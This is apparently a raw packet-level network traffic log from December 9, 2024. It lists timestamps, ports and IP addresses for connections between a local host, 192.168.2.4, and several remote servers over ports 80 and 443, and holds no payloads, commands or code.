Dec 9, 2024 08:08:18.600250959 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.600280046 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.600291967 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.600326061 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.601136923 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.601188898 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.601197004 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.601208925 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.601244926 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.602220058 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.602231979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.602242947 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.602276087 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.602288961 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.603013039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.603063107 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.603074074 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.603112936 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.603955030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.603996992 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.604058981 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.604070902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.604113102 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.604885101 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.604959011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.604970932 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.605007887 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.606710911 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.607328892 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.607381105 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.607481003 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.607530117 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.608927011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.608937979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.608947992 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.608958006 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.608972073 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.608982086 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.609002113 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.754175901 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.754316092 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.754327059 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.754360914 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.754379988 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.754621983 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.754631996 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.754642963 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.754671097 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.754684925 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.755629063 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.755640030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.755649090 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.755672932 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.755686045 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.756601095 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.756609917 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.756620884 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.756647110 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.756665945 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.757468939 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.757515907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.757649899 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.757690907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.774770021 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.774914026 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.774924040 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.774961948 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.774986982 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.775199890 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.775209904 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.775219917 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.775248051 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.775268078 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.776340008 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.776351929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.776401997 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.776931047 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.776941061 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.776951075 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.776992083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.777729034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.777745962 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.777789116 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.777800083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.777884960 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.778034925 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.778739929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.778750896 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.778791904 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.778891087 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.779853106 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.779863119 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.779874086 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.779895067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.779913902 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.780621052 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.780668020 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.780808926 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.780818939 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.780874968 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.781764984 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.781775951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.781785011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.781817913 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.781829119 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.782567024 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.782577991 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.782588005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.782629967 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.783488035 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.783498049 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.783508062 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.783538103 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.783550024 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.784358978 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.784405947 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.784507990 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.784518957 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.784545898 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.784558058 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.785397053 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.785408020 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.785419941 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.785446882 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.785480022 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.786372900 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.786384106 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.786395073 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.786422014 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.786447048 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.787305117 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.787322044 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.787332058 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.787353992 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.787372112 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.788163900 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.788320065 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.788331985 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.788369894 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.788394928 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.789211035 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.789222002 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.789236069 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.789267063 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.789294958 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.790117025 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.790127993 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.790138960 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.790172100 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.790213108 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.790869951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.790880919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.790920019 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.791008949 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.791239023 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.791980028 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.791990995 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.792001009 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.792042017 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.792061090 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.792871952 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.792890072 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.792934895 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.793040037 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.793266058 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.793890953 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.793900967 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.793911934 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.793940067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.793951035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.794820070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.794831038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.794846058 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.794879913 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.795706034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.795989037 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.795998096 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.796008110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.796044111 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.796097040 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.796822071 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.796871901 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.797008991 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.797020912 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.797060966 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.797811031 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.797887087 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:20.183422089 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:20.183451891 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:20.183525085 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:20.186769009 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:20.186781883 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:21.055099010 CET	49777	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:21.055401087 CET	49801	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:21.174779892 CET	80	49801	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:21.175071955 CET	80	49777	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:21.175142050 CET	49777	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:21.175159931 CET	49801	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:21.177233934 CET	49801	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:21.296448946 CET	80	49801	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:21.402039051 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:21.402599096 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:21.404454947 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:21.404468060 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:21.404676914 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:21.448225975 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:21.463598013 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:21.463830948 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:21.463860989 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.413937092 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.414035082 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.414119959 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:22.416342020 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:22.416357994 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.416393995 CET	49799	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:22.416399002 CET	443	49799	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.468606949 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:22.468625069 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.468713999 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:22.468992949 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:22.469002962 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:22.514668941 CET	80	49801	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:22.514877081 CET	49801	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:22.517575026 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:22.517864943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:22.637057066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:22.637233019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:22.637370110 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:22.637370110 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:22.637491941 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:22.756835938 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.678287983 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:23.678350925 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:23.680063009 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:23.680129051 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:23.686731100 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:23.686748028 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:23.687011957 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:23.691611052 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:23.691637039 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:23.691672087 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:23.700268030 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:23.700288057 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:23.700527906 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:23.741141081 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:23.783341885 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:23.977150917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977204084 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977216959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977284908 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977299929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977313042 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977320910 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977332115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977344036 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977344036 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977353096 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977360010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977371931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977386951 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977400064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:23.977533102 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977544069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:23.977582932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.097047091 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.097083092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.097151995 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.169390917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.169473886 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.169558048 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.169610977 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.173475027 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.173532009 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.173609972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.173649073 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.181838989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.181905985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.181946993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.182029963 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.190252066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.190335035 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.190428972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.190536022 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.198643923 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.198694944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.198981047 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.199028969 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.206984997 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.207052946 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.207113028 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.207161903 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.215378046 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.215488911 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.215512037 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.215524912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.223936081 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.223951101 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.224000931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.232203007 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.232218027 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.232281923 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.240526915 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.240571022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.240582943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.240652084 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.248838902 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.248956919 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.248961926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.249001026 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.288815975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.288876057 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.345259905 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.345284939 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.345292091 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.345303059 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.345330954 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.345336914 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.345360041 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.345372915 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.345388889 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.345410109 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.361437082 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.361491919 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.361560106 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.361598015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.363871098 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.363919020 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.363919973 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.363955975 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.368871927 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.368913889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.368994951 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.369045973 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.373888016 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.373954058 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.373991013 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.374028921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.378946066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.378992081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.379053116 CET	80	49807	185.215.113.16	192.168.2.4
